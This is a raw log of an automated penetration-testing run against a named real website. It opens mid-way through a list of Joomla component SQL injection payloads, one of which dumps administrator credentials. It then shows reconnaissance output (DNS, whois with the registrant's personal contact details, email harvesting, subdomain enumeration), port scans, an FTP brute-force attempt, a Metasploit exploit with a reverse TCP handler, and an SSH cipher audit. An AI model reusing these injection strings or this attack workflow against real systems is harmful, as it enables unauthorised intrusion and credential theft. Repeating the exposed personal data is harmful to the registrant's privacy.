2067. Check: /components/com_seminar/
2068. Exploit: /index.php?option=com_seminar&task=View_seminar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2
2069. Vulnerable? Yes
2070.  
2071. # 404
2072. Info -> Component: com_ijoomla_rss Blind SQL Injection Vulnerability
2073. Versions effected: N/A
2074. Check: /components/com_ijoomla_rss/
2075. Exploit: /index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=1::/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=2
2076. Vulnerable? Yes
2077.  
2078. # 405
2079. Info -> Component: com_jumi (fileid) Blind SQL Injection Vulnerability
2080. Versions effected: N/A
2081. Check: /components/com_jumi/
2082. Exploit: /index.php?option=com_jumi&fileid=1+and+1=1::/index.php?option=com_jumi&fileid=1+and+1=2
2083. Vulnerable? Yes
2084.  
2085. # 406
2086. Info -> Component: com_tickets (id) SQL Injection Vulnerability
2087. Versions effected: N/A
2088. Check: /components/com_tickets/
2089. Exploit: /index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
2090. Info -> Component: com_php (id) Blind SQL Injection Vulnerability
2091. Versions effected: N/A
2092. Check: /components/com_php/
2093. Exploit: /index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=1::/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=2
2094. Vulnerable? Yes
2095. # 426
2096. Info -> Component: com_jobline (search) Blind SQL Injection Vulnerability
2097. Versions effected: 1.3.1 <=
2098. Check: /components/com_jobline/
2099. Exploit: /index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=1 and '%'='::/index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=2 and '%'='
2100. Vulnerable? Yes
2101.  
2102.  
2103. # 454
2104. Info -> Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability
2105. Versions effected: 5.6.2 <=
2106. Check: /components/com_aclassf/
2107. Exploit: /index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=2
2108. Vulnerable? Yes
2109.  
2110. # 455
2111. Info -> Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerability
2112. Versions effected: 7.5 <=
2113. Check: /components/com_aclassf/
2114. Exploit: /index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2
2115. Vulnerable? Yes
2116.  
2117. # 459
2118. Info -> Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability
2119. Versions effected: N/A
2120. Check: /components/com_kunena/
2121. Exploit: /index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
2122. Vulnerable? Yes
2123.  
2124. # 460
2125. Info -> Component: com_misterestate Blind SQL Injection Vulnerability
2126. Versions effected: N/A
2127. Check: /components/com_misterestate/
2128. Exploit: /index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2
2129. Vulnerable? Yes
2130. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
2131. Server: 192.168.1.254
2132. Address: 192.168.1.254#53
2133.  
2134. Non-authoritative answer:
2135. Name: novalisfestival.com
2136. Address: 185.119.174.103
2137. Name: novalisfestival.com
2138. Address: 2a01:9cc0:0:1:1a:3:0:11c
2139.  
2140. novalisfestival.com has address 185.119.174.103
2141. novalisfestival.com has IPv6 address 2a01:9cc0:0:1:1a:3:0:11c
2142. novalisfestival.com mail is handled by 10 mx9.webfaction.com.
2143. novalisfestival.com mail is handled by 10 mx7.webfaction.com.
2144. novalisfestival.com mail is handled by 10 mx8.webfaction.com.
2145.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
2146.  
2147. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
2148.  
2149. [+] Target is novalisfestival.com
2150. [+] Loading modules.
2151. [+] Following modules are loaded:
2152. [x] [1] ping:icmp_ping - ICMP echo discovery module
2153. [x] [2] ping:tcp_ping - TCP-based ping discovery module
2154. [x] [3] ping:udp_ping - UDP-based ping discovery module
2155. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
2156. [x] [5] infogather:portscan - TCP and UDP PortScanner
2157. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
2158. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
2159. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
2160. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
2161. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
2162. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
2163. [x] [12] fingerprint:smb - SMB fingerprinting module
2164. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
2165. [+] 13 modules registered
2166. [+] Initializing scan engine
2167. [+] Running scan engine
2168. [-] ping:tcp_ping module: no closed/open TCP ports known on 185.119.174.103. Module test failed
2169. [-] ping:udp_ping module: no closed/open UDP ports known on 185.119.174.103. Module test failed
2170. [-] No distance calculation. 185.119.174.103 appears to be dead or no ports known
2171. [+] Host: 185.119.174.103 is up (Guess probability: 50%)
2172. [+] Target: 185.119.174.103 is alive. Round-Trip Time: 0.50754 sec
2173. [+] Selected safe Round-Trip Time value is: 1.01508 sec
2174. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
2175. [-] fingerprint:smb need either TCP port 139 or 445 to run
2176. [+] Primary guess:
2177. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2178. [+] Other guesses:
2179. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2180. [+] Host 185.119.174.103 Running OS: (Guess probability: 95%)
2181. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2182. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2183. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2184. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2185. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2186. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2187. [+] Host 185.119.174.103 Running OS: ›FV (Guess probability: 95%)
2188. [+] Cleaning up scan engine
2189. [+] Modules deinitialized
2190. [+] Execution completed.
2191.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
2192. Domain Name: NOVALISFESTIVAL.COM
2193. Registry Domain ID: 1862235451_DOMAIN_COM-VRSN
2194. Registrar WHOIS Server: whois.udag.net
2195. Registrar URL: http://www.united-domains.de
2196. Updated Date: 2017-06-11T07:09:03Z
2197. Creation Date: 2014-06-10T07:50:11Z
2198. Registry Expiry Date: 2018-06-10T07:50:11Z
2199. Registrar: United-Domains AG
2200. Registrar IANA ID: 1408
2201. Registrar Abuse Contact Email: abuse@united-domains.de
2202. Registrar Abuse Contact Phone: +49.8151368670
2203. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
2204. Name Server: NS1.WEBFACTION.COM
2205. Name Server: NS2.WEBFACTION.COM
2206. Name Server: NS3.WEBFACTION.COM
2207. Name Server: NS4.WEBFACTION.COM
2208. DNSSEC: unsigned
2209. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
2210. >>> Last update of whois database: 2018-01-05T17:09:08Z <<<
2211.  
2212. For more information on Whois status codes, please visit https://icann.org/epp
2213.  
2214. NOTICE: The expiration date displayed in this record is the date the
2215. registrar's sponsorship of the domain name registration in the registry is
2216. currently set to expire. This date does not necessarily reflect the expiration
2217. date of the domain name registrant's agreement with the sponsoring
2218. registrar. Users may consult the sponsoring registrar's Whois database to
2219. view the registrar's reported date of expiration for this registration.
2220.  
2221. TERMS OF USE: You are not authorized to access or query our Whois
2222. database through the use of electronic processes that are high-volume and
2223. automated except as reasonably necessary to register domain names or
2224. modify existing registrations; the Data in VeriSign Global Registry
2225. Services' ("VeriSign") Whois database is provided by VeriSign for
2226. information purposes only, and to assist persons in obtaining information
2227. about or related to a domain name registration record. VeriSign does not
2228. guarantee its accuracy. By submitting a Whois query, you agree to abide
2229. by the following terms of use: You agree that you may use this Data only
2230. for lawful purposes and that under no circumstances will you use this Data
2231. to: (1) allow, enable, or otherwise support the transmission of mass
2232. unsolicited, commercial advertising or solicitations via e-mail, telephone,
2233. or facsimile; or (2) enable high volume, automated, electronic processes
2234. that apply to VeriSign (or its computer systems). The compilation,
2235. repackaging, dissemination or other use of this Data is expressly
2236. prohibited without the prior written consent of VeriSign. You agree not to
2237. use electronic processes that are automated and high-volume to access or
2238. query the Whois database except as reasonably necessary to register
2239. domain names or modify existing registrations. VeriSign reserves the right
2240. to restrict your access to the Whois database in its sole discretion to ensure
2241. operational stability. VeriSign may restrict or terminate your access to the
2242. Whois database for failure to abide by these terms of use. VeriSign
2243. reserves the right to modify these terms at any time.
2244.  
2245. The Registry database contains ONLY .COM, .NET, .EDU domains and
2246. Registrars.
2247.  
2248. Domain Name: novalisfestival.com
2249. Registry Domain ID: 1862235451_DOMAIN_COM-VRSN
2250. Registrar WHOIS Server: whois.udag.net
2251. Registrar URL: http://www.united-domains.de/
2252. Updated Date: 2017-06-11T07:09:03Z
2253. Creation Date: 2014-06-10T07:50:11Z
2254. Registrar Registration Expiration Date: 2018-06-10T07:50:11Z
2255. Registrar: united domains AG
2256. Registrar IANA ID: 1408
2257. Registrar Abuse Contact Email: abuse@united-domains.de
2258. Registrar Abuse Contact Phone: +49.8151368670
2259. Reseller:
2260. Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
2261. Registry Registrant ID:
2262. Registrant Name: Davor Branimir Vince
2263. Registrant Organization: Novalis Concept
2264. Registrant Street: Nova Cesta 117
2265. Registrant City: Zagreb
2266. Registrant State/Province:
2267. Registrant Postal Code: 10000
2268. Registrant Country: HR
2269. Registrant Phone: +385.958848971
2270. Registrant Phone Ext:
2271. Registrant Fax:
2272. Registrant Fax Ext:
2273. Registrant Email: info@novalisfestival.com
2274. Registry Admin ID:
2275. Admin Name: Davor Branimir Vince
2276. Admin Organization: Novalis Concept
2277. Admin Street: Nova Cesta 117
2278. Admin City: Zagreb
2279. Admin State/Province:
2280. Admin Postal Code: 10000
2281. Admin Country: HR
2282. Admin Phone: +385.958848971
2283. Admin Phone Ext:
2284. Admin Fax:
2285. Admin Fax Ext:
2286. Admin Email: info@novalisfestival.com
2287. Registry Tech ID:
2288. Tech Name: Host Master
2289. Tech Organization: united-domains AG
2290. Tech Street: Gautinger Str. 10
2291. Tech City: Starnberg
2292. Tech State/Province: Bayern
2293. Tech Postal Code: 82319
2294. Tech Country: DE
2295. Tech Phone: +49.8151368670
2296. Tech Phone Ext:
2297. Tech Fax: +49.81513686777
2298. Tech Fax Ext:
2299. Tech Email: hostmaster@united-domains.de
2300. Name Server: ns4.webfaction.com
2301. Name Server: ns3.webfaction.com
2302. Name Server: ns1.webfaction.com
2303. Name Server: ns2.webfaction.com
2304. DNSSEC: unsigned
2305. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
2306. >>> Last update of WHOIS database: 2017-06-11T07:09:03Z
2307.  
2308. For more information on Whois status codes, please visit https://www.icann.org/epp
2309.  
2310. ; Whois Server Version 1.86
2311. ;
2312. ; Terms and conditions:
2313. ;
2314. ; This data is provided by united-domains AG
2315. ; for information purposes, and to assist persons obtaining information
2316. ; about or related to domain name registration records.
2317. ; united-domains AG does not guarantee its accuracy.
2318. ; By submitting a WHOIS query, you agree that you will use this data
2319. ; only for lawful purposes and that, under no circumstances, you will
2320. ; use this data to
2321. ; 1) allow, enable, or otherwise support the transmission of mass
2322. ; unsolicited, commercial advertising or solicitations via e-mail
2323. ; (spam); or
2324. ; 2) enable high volume, automated, electronic processes that apply
2325. ; to this WHOIS server.
2326. ; These terms may be changed without prior notice.
2327. ; By submitting this query, you agree to abide by this policy.
2328.  
2329.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
2330.  
2331. *******************************************************************
2332. * *
2333. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
2334. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
2335. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
2336. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
2337. * *
2338. * TheHarvester Ver. 2.7 *
2339. * Coded by Christian Martorella *
2340. * Edge-Security Research *
2341. * cmartorella@edge-security.com *
2342. *******************************************************************
2343.  
2344.  
2345. Full harvest..
2346. [-] Searching in Google..
2347. Searching 0 results...
2348. Searching 100 results...
2349. Searching 200 results...
2350. [-] Searching in PGP Key server..
2351. [-] Searching in Bing..
2352. Searching 50 results...
2353. Searching 100 results...
2354. Searching 150 results...
2355. Searching 200 results...
2356. [-] Searching in Exalead..
2357. Searching 50 results...
2358. Searching 100 results...
2359. Searching 150 results...
2360. Searching 200 results...
2361. Searching 250 results...
2362.  
2363.  
2364. [+] Emails found:
2365. ------------------
2366. sales@novalisfestival.com
2367.  
2368. [+] Hosts found in search engines:
2369. ------------------------------------
2370. [-] Resolving hostnames IPs...
2371. 185.119.174.103:www.novalisfestival.com
2372. [+] Virtual hosts:
2373. ==================
2374. 185.119.174.103 scotsfiddlefestival
2375. 185.119.174.103 www.oak-beams
2376. 185.119.174.103 baaningkao
2377. 185.119.174.103 www.hipsarchitecturalironmongery
2378. 185.119.174.103 www.exiliadosrepublicanos.info
2379. 185.119.174.103 www.zagrebtours
2380. 185.119.174.103 www.montaguejeffery
2381. 185.119.174.103 www.updown.co.il
2382. 185.119.174.103 yumtz.com
2383. 185.119.174.103 www.lewiscommercials
2384. 185.119.174.103 eplaw
2385. 185.119.174.103 www.constructionleadershipcouncil
2386. 185.119.174.103 haywoodparkfarm
2387. 185.119.174.103 www.dua
2388. 185.119.174.103 eplaw.org
2389. 185.119.174.103 www.montaguejeffery.co.uk
2390. 185.119.174.103 www.constructionleadershipcouncil.co.uk
2391. 185.119.174.103 mesta.net
2392. 185.119.174.103 www.ferrocentralsa.com.ar
2393. 185.119.174.103 www.onsk8.com
2394. 185.119.174.103 www.derinbilgi.com.tr
2395. 185.119.174.103 grothia.gr
2396. 185.119.174.103 www.7iklim.com
2397. 185.119.174.103 www.gak.gda.pl
2398. 185.119.174.103 www.vikendi.com
2399.  
2400. ******************************************************
2401. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
2402. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
2403. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
2404. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
2405. * |___/ *
2406. * Metagoofil Ver 2.2 *
2407. * Christian Martorella *
2408. * Edge-Security.com *
2409. * cmartorella_at_edge-security.com *
2410. ******************************************************
2411.  
2412. [-] Starting online search...
2413.  
2414. [-] Searching for doc files, with a limit of 200
2415. Searching 100 results...
2416. Searching 200 results...
2417. Results: 0 files found
2418. Starting to download 50 of them:
2419. ----------------------------------------
2420.  
2421.  
2422. [-] Searching for pdf files, with a limit of 200
2423. Searching 100 results...
2424. Searching 200 results...
2425. Results: 0 files found
2426. Starting to download 50 of them:
2427. ----------------------------------------
2428.  
2429.  
2430. [-] Searching for xls files, with a limit of 200
2431. Searching 100 results...
2432. Searching 200 results...
2433. Results: 0 files found
2434. Starting to download 50 of them:
2435. ----------------------------------------
2436.  
2437.  
2438. [-] Searching for csv files, with a limit of 200
2439. Searching 100 results...
2440. Searching 200 results...
2441. Results: 0 files found
2442. Starting to download 50 of them:
2443. ----------------------------------------
2444.  
2445.  
2446. [-] Searching for txt files, with a limit of 200
2447. Searching 100 results...
2448. Searching 200 results...
2449. Results: 0 files found
2450. Starting to download 50 of them:
2451. ----------------------------------------
2452.  
2453. processing
2454. user
2455. email
2456.  
2457. [+] List of users found:
2458. --------------------------
2459.  
2460. [+] List of software found:
2461. -----------------------------
2462.  
2463. [+] List of paths and servers found:
2464. ---------------------------------------
2465.  
2466. [+] List of e-mails found:
2467. ----------------------------
2468.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
2469.  
2470. ; <<>> DiG 9.11.2-5-Debian <<>> -x novalisfestival.com
2471. ;; global options: +cmd
2472. ;; Got answer:
2473. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37654
2474. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
2475.  
2476. ;; OPT PSEUDOSECTION:
2477. ; EDNS: version: 0, flags:; udp: 4096
2478. ;; QUESTION SECTION:
2479. ;com.novalisfestival.in-addr.arpa. IN PTR
2480.  
2481. ;; AUTHORITY SECTION:
2482. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102523 1800 900 604800 3600
2483.  
2484. ;; Query time: 94 msec
2485. ;; SERVER: 192.168.1.254#53(192.168.1.254)
2486. ;; WHEN: Fri Jan 05 12:09:55 EST 2018
2487. ;; MSG SIZE rcvd: 129
2488.  
2489. dnsenum VERSION:1.2.4
2490. 
2491. ----- novalisfestival.com -----
2492. 
2493.  
2494. Host's addresses:
2495. __________________
2496.  
2497. novalisfestival.com. 3554 IN A 185.119.174.103
2498. 
2499.  
2500. Name Servers:
2501. ______________
2502.  
2503. ns3.webfaction.com. 300 IN A 62.138.130.11
2504. ns2.webfaction.com. 300 IN A 103.44.220.74
2505. ns4.webfaction.com. 300 IN A 148.72.160.4
2506. ns1.webfaction.com. 300 IN A 185.20.51.42
2507. 
2508.  
2509. Mail (MX) Servers:
2510. ___________________
2511.  
2512. mx7.webfaction.com. 3600 IN A 185.20.49.162
2513. mx8.webfaction.com. 3600 IN A 185.20.49.163
2514. mx9.webfaction.com. 3600 IN A 185.20.49.164
2515. 
2516.  
2517. Trying Zone Transfers and getting Bind Versions:
2518. _________________________________________________
2519.  
2520. 
2521. Trying Zone Transfer for novalisfestival.com on ns3.webfaction.com ...
2522.  
2523. Trying Zone Transfer for novalisfestival.com on ns2.webfaction.com ...
2524.  
2525. Trying Zone Transfer for novalisfestival.com on ns4.webfaction.com ...
2526.  
2527. Trying Zone Transfer for novalisfestival.com on ns1.webfaction.com ...
2528.  
2529. brute force file not specified, bay.
2530.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
2531. 
2532. ____ _ _ _ _ _____
2533. / ___| _ _| |__ | (_)___| |_|___ / _ __
2534. \___ \| | | | '_ \| | / __| __| |_ \| '__|
2535. ___) | |_| | |_) | | \__ \ |_ ___) | |
2536. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
2537.  
2538. # Coded By Ahmed Aboul-Ela - @aboul3la
2539.  
2540. [-] Enumerating subdomains now for novalisfestival.com
2541. [-] verbosity is enabled, will show the subdomains results in realtime
2542. [-] Searching now in Baidu..
2543. [-] Searching now in Yahoo..
2544. [-] Searching now in Google..
2545. [-] Searching now in Bing..
2546. [-] Searching now in Ask..
2547. [-] Searching now in Netcraft..
2548. [-] Searching now in DNSdumpster..
2549. [-] Searching now in Virustotal..
2550. [-] Searching now in ThreatCrowd..
2551. [-] Searching now in SSL Certificates..
2552. [-] Searching now in PassiveDNS..
2553. Virustotal: www.novalisfestival.com
2554. SSL Certificates: www.novalisfestival.com
2555. Bing: www.novalisfestival.com
2556. Yahoo: www.novalisfestival.com
2557. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-novalisfestival.com.txt
2558. [-] Total Unique Subdomains Found: 1
2559. www.novalisfestival.com
2560.  
2561.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
2562.  ║ ╠╩╝ ║ ╚═╗╠═╣
2563.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
2564.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
2565. 
2566. www.novalisfestival.com
2567.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-novalisfestival.com-full.txt
2568. 
2569.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
2570.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
2571.  
2572.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
2573. PING novalisfestival.com(2a01:9cc0:0:1:1a:3:0:11c (2a01:9cc0:0:1:1a:3:0:11c)) 56 data bytes
2574. 64 bytes from 2a01:9cc0:0:1:1a:3:0:11c (2a01:9cc0:0:1:1a:3:0:11c): icmp_seq=1 ttl=56 time=94.9 ms
2575.  
2576. --- novalisfestival.com ping statistics ---
2577. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
2578. rtt min/avg/max/mdev = 94.958/94.958/94.958/0.000 ms
2579.  
2580.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
2581.  
2582. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 12:10 EST
2583. Nmap scan report for novalisfestival.com (185.119.174.103)
2584. Host is up (0.098s latency).
2585. Other addresses for novalisfestival.com (not scanned): 2a01:9cc0:0:1:1a:3:0:11c
2586. rDNS record for 185.119.174.103: web564.webfaction.com
2587. Not shown: 465 filtered ports, 2 closed ports
2588. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2589. PORT STATE SERVICE
2590. 21/tcp open ftp
2591. 22/tcp open ssh
2592. 80/tcp open http
2593. 443/tcp open https
2594. 3306/tcp open mysql
2595. 5432/tcp open postgresql
2596.  
2597. Nmap done: 1 IP address (1 host up) scanned in 4.53 seconds
2598.  
2599.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
2600.  + -- --=[Port 21 opened... running tests...
2601.  
2602. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 12:10 EST
2603. Nmap scan report for novalisfestival.com (185.119.174.103)
2604. Host is up (0.098s latency).
2605. Other addresses for novalisfestival.com (not scanned): 2a01:9cc0:0:1:1a:3:0:11c
2606. rDNS record for 185.119.174.103: web564.webfaction.com
2607.  
2608. PORT STATE SERVICE VERSION
2609. 21/tcp open ftp vsftpd 3.0.2
2610. | ftp-brute:
2611. | Accounts: No valid accounts found
2612. |_ Statistics: Performed 1101 guesses in 182 seconds, average tps: 5.9
2613. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2614. Device type: general purpose
2615. Running: Linux 3.X|4.X
2616. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
2617. OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8
2618. Network Distance: 11 hops
2619. Service Info: OS: Unix
2620.  
2621. TRACEROUTE (using port 21/tcp)
2622. HOP RTT ADDRESS
2623. 1 0.97 ms 192.168.1.254
2624. 2 8.68 ms 10.135.18.1
2625. 3 30.39 ms 75.154.223.222
2626. 4 30.58 ms lag-113.ear3.NewYork1.Level3.net (4.15.212.245)
2627. 5 98.10 ms ae-226-3602.edge3.London15.Level3.net (4.69.167.94)
2628. 6 97.82 ms ae-118-3504.edge3.London15.Level3.net (4.69.167.86)
2629. 7 102.39 ms 212.187.195.54
2630. 8 100.90 ms 185.52.26.128
2631. 9 100.18 ms 185.52.26.183
2632. 10 97.69 ms uk.slo.prgn.b10.stk1.misp.co.uk (185.52.26.180)
2633. 11 96.79 ms web564.webfaction.com (185.119.174.103)
2634.  
2635. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2636. Nmap done: 1 IP address (1 host up) scanned in 185.65 seconds
2637.  , ,
2638. / \
2639. ((__---,,,---__))
2640. (_) O O (_)_________
2641. \ _ / |\
2642. o_o \ M S F | \
2643. \ _____ | *
2644. ||| WW|||
2645. ||| |||
2646. 
2647.  
2648. =[ metasploit v4.16.28-dev ]
2649. + -- --=[ 1716 exploits - 985 auxiliary - 300 post ]
2650. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
2651. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
2652.  
2653. RHOST => novalisfestival.com
2654. RHOSTS => novalisfestival.com
2655. [-] novalisfestival.com:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (novalisfestival.com:21).
2656. [*] Exploit completed, but no session was created.
2657. [*] Started reverse TCP double handler on 2001:56b:dcc9:af00:6563:9d63:c52a:bdcf:4444
2658. [-] novalisfestival.com:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (novalisfestival.com:21).
2659. [*] Exploit completed, but no session was created.
2660.  + -- --=[Port 22 opened... running tests...
2661. # general
2662. (gen) banner: SSH-2.0-OpenSSH_7.4
2663. (gen) software: OpenSSH 7.4
2664. (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
2665. (gen) compression: enabled (zlib@openssh.com)
2666.  
2667. # key exchange algorithms
2668. (kex) curve25519-sha256 -- [warn] unknown algorithm
2669. (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
2670. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
2671. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2672. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
2673. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2674. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
2675. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2676. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2677. `- [info] available since OpenSSH 4.4
2678. (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2679. (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
2680. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2681. `- [warn] using weak hashing algorithm
2682. `- [info] available since OpenSSH 2.3.0
2683. (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2684. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2685. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2686. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2687. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
2688. `- [warn] using small 1024-bit modulus
2689. `- [warn] using weak hashing algorithm
2690. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2691.  
2692. # host-key algorithms
2693. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2694. (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
2695. (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
2696. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
2697. `- [warn] using weak random number generator could reveal the key
2698. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2699. (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
2700.  
2701. # encryption algorithms (ciphers)
2702. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2703. `- [warn] using weak cipher
2704. `- [warn] using weak cipher mode
2705. `- [warn] using small 64-bit block size
2706. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2707. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2708. `- [fail] disabled since Dropbear SSH 0.53
2709. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2710. `- [warn] using weak cipher mode
2711. `- [warn] using small 64-bit block size
2712. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2713. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2714. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2715. `- [warn] using weak cipher mode
2716. `- [warn] using small 64-bit block size
2717. `- [info] available since OpenSSH 2.1.0
2718. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2719. `- [warn] using weak cipher mode
2720. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2721. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2722. `- [warn] using weak cipher mode
2723. `- [info] available since OpenSSH 2.3.0
2724. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2725. `- [warn] using weak cipher mode
2726. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
2727. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2728. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2729. `- [warn] using weak cipher mode
2730. `- [info] available since OpenSSH 2.3.0
2731. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2732. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
2733. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
